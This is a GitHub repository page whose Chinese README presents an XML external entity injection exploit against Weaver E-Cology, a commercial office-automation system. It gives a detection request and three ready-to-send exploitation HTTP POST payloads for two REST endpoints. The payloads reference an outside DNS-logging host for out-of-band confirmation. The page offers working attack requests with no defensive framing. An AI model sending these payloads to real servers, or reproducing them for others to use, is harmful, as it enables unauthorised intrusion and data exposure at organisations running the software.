Skip to content

Asura88/deleteUserRequestInfoByXml

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
README.md
README.md
 
 

Repository files navigation

泛微E-Cology XML外部实体注入漏洞

检测

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: 
Content-Type: application/xml

<M><syscode>666</syscode></M>

利用

利用一:

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: 
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dns1.1.eyes.sh">
<M><syscode>&send;</syscode></M>

利用二:

POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: 
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dns2.1.eyes.sh">
<M><syscode>&send;</syscode></M>

利用三:

可回显,待完善

POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: 
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dns3.1.eyes.sh">
<M><syscode>&send;</syscode></M>

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

15 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published